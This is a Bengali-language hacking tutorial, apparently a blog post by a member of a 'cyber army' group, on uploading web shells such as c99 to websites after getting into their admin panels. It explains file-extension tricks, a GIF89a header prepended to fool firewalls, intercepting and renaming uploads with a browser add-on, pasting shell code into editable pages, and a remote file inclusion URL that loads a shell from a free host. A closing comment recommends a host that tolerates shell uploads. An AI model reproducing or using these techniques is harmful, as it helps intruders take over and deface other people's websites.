প্রথম এ বলে নেই এটি একটি NFN (Not For Noobs) টিউটোরিয়াল । এটি বুঝতে হলে বেসিক হ্যাকিং জানা অত্যাবশ্যক । আমরা অনেক সময় ওয়েবসাইট এর অ্যাডমিন প্যানেল এ প্রবেশ করি এবং পি এইচ পি, এ এস পি , এ এস পি এক্স ইত্যাদি শেল আপলোড এর চেস্টা করি । কিন্তু দেখা যায় বিভিন্ন সমস্যা হয় । শেল আপলোড হয়না ... এন্টিভাইরাস ব্লক দেয় ইত্যাদি । অ্যাডমিন প্যানেল এ লগিন করার পর সহজেই আপলোড বাটন এর সাহায্যে শেল আপলোড দেয়া যায় । কিন্তু মাঝে মাঝে কিছু সমস্যা হতে পারে । তাই সহজ উপায় এ শেল আপলোড না হলে কিভাভে তাকে কাস্টোমাইজ করে আপলোড করা যায় তাই আপনাদেরকে বলব ।
প্রথম পদ্ধতি
আমরা জানি বেশিরভাগ শেল থাকে .php বাঃ .asp ফরমেটে । অনেক সময় অনেক ওয়েবসাইট সে ফরমেট গুলো সাপোর্ট করে না । এর সবথেকে সহজ সমাধান হল সেগুলকে রিনেম করা । মানে নামের শেষ এ .php এর পরে .jpg , .png , .doc এসব বসিয়ে দেয়া । তাতে অনেক সময় কাজ হয়ে যায় ।
দ্বিতীয় পদ্ধতি
দ্বিতীয় পদ্ধতি হল শেল আপ্লোডার আপলোড করে শেল আপলোড করুন । এমন শেল আপ্লোডার আপলোড করুন যেটি এন্টিভাইরাস বাঃ ফায়ার ওয়াল দ্বারা সনাক্ত হবে না । এরকম আপ্লোডার আপনি নেটে খুজলেই পাবেন ।
তৃতীয় পদ্ধতি
কিছু ফায়াওয়াল যেমন comodo firewall , encripted security শেল এর হেডার চেক করে ও সেই শেল কে ব্লক করে দেয় । তাই এ থেকে বাচার উপায় হচ্ছে notepad এ এডিট করতে শেল টি খুলুন আমরা একে GIF89A SHELL SCRIPT দ্বারা এডিট করব । এর জন্য শেল এর স্ক্রিপ্ট শুরু হবার আগে GIF89a; অ্যাড করে দিন । এরপর সেভ করে নিন ।
চতুর্থ পদ্ধতি
আপনার ফায়ার ফক্স ব্রাউযার এ LIVE HTTP HEADERS অ্যাড ওয়ান টি ইন্সটাল করে নিন ।
> এখন আপনার পি এইচ পি শেল এর নামের শেষ এ .jpg বাঃ .png অ্যাড করে নিন । মানে সেই সাইট এ যে ফাইল ফরমেট সাপোর্ট করে আরকি ।
> এখন সেই সাইটে শেল শেল আপলোড করে আপনার অ্যাড অন টি খুলুন । সেই পেজেই
> তাহলে আপনার live http header নিচের ছবির মত দেখাবে ।
> এরপর রিপ্লাই বাটন এ ক্লিক করার পর shell.php.jpg তে ক্লিক করুন ।
> তাহলে দেখবেন নতুন উইন্ডো ওপেন হবে । সেখানে দুটি বক্স থাকবে । আমাদের কাজ ২ নাম্বার টিকে নিয়ে ।
> এরপর দুই নাম্বার বক্স এ .jpg তুলে দিয়ে shell. php নামে রিনেম করুন ।
দেখুন আমরা সার্ভার কে প্রথমে দেখালাম আমরা ছবি আপলোড করছি । সে তাই মেনে নিল । এরপর এই অ্যাড অন কে দিয়ে আমরা সেই পেজ এডিট করে আমাদের শেল ইঞ্জেক্ট করে দিলাম ।
পঞ্চম পদ্ধতি
উপরের চার টি পদ্ধতি কাজ করবে যখন আপনি আপলোড বাটন পাবেন । না পেলে ......... আপনাকে খুজতে হবে এডিট ইমেজ বাঃ এডিট আর্টিকেল নামে কিছু আছে কিনা । আপনাকে এটিও খেয়াল রাখতে হবে যে url এর শেষ এ .php ..asp এসব আছে কিনা । থাকলে সেই এডিট বাটনে ক্লিক করে সেখানে থাকা সবকিছু মুছে ফেলতে হবে । এরপর আপনার
শেল কে নোটপ্যাড এ খুলে সেখান থেকে সব কোড কপি করে পেস্ট করে দিতে হবে । কিন্তু অবশ্যই খেয়াল রাখবেন যে সেই পেযে যেন php কোড এডিট করার অপসন থাকে । সেটা না হলে আপনার শেল এর স্ক্রিপ্ট কাজ করবে না ।
ষষ্ঠ পদ্ধতি
RFI Vulnerable সাইটে সাধারনত অন্যান্য ফ্রী হোস্টিং সাইটের মাদ্ধমে শেল আপলোড করতে হয় । এর জন্য
> আপনার শেল কে যে কোনও ফ্রী হোস্টিং সাইট যেমন http://www.110mb.com, http://www.my3gb.com ইত্যাদি সাইট এ আপলোড করুন ।
> ধরুন আপনার লিঙ্ক হল http://www.example.110mb.com/c99.txt এবং আপনার vulnerable সাইট এর লিঙ্ক হল http://www.abc.com . তাহলে শেল কে সাইট এ বসাতে কম্যান্ড টি হবে ।
http://www.abc .com/v2/index.php?page=http://www.example.110mb.com/c99.txt
> আপনি আপনার শেল ও সাইট এর নাম এখানে বসাবেন । এটি উদাহরন দেয়া হল । কিন্তু সাইট RFI VULNERABLE না হলে এটি কাজ করবে না
শেষ কথা
আর অনেক পদ্ধতি আছে । আমি সেগুল আয়ত্তে আনতে পারলে শেয়ার করব । আজকে তো এগুলো বললাম পরের লেখায় joomla, wordpress, vbulletine এসব সাইট এ কিভাবে শেল আপলোড করতে হয় টা তুলে ধরব । আর বাংলাদেশ সাইবার আর্মি এর যে কোনও পর্যায় এর সদস্য বাদে অন্য কেউ লেখকের অনুমতি ছাড়া এটি কপি পেস্ট করবেন না ।
এরকম অনেক কিছু পাবেন > http://www.facebppk.com/CY133R এ
আর আমি আছি > http://www.facebook.com/II.45LAN.II এ
আল্লাহ হাফেয
আমি রাশেদ রাহুল। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 12 বছর 3 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 53 টি টিউন ও 50 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
অনেক free hosting সাইটে শেল আপলোড দিলে এরা একাউন্ট ব্যান করে দেয়। তবে এর জন্য আমার মতে http://www.prozapoti.com এই সাইট টা বেটার। কারন এরা কখনই ব্যান করেনা।